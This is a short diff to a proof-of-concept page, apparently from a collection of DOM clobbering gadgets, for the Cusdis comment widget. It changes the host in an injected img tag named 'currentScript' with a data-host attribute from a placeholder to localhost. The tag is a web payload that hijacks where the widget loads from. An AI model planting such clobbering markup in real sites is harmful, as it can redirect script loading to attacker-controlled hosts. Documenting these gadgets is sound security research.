--- a/domc-gadgets-assets/gadgets/cusdis/poc.html
+++ b/domc-gadgets-assets/gadgets/cusdis/poc.html
@@ -22,8 +22,8 @@
 <section class="section">
   <div class="column">
   <p><span class="label">Payload</span><br><br>
-  <pre>&lt;img name=&quot;currentScript&quot; data-host=&quot;https://xxx.xxx.xxx&quot;&gt;</pre>
-  <img name="currentScript" data-host="https://xxx.xxx.xxx">
+  <pre>&lt;img name=&quot;currentScript&quot; data-host=&quot;http://localhost:9999&quot;&gt;</pre>
+  <img name="currentScript" data-host="http://localhost:9999">
   </div>
 </section>
 
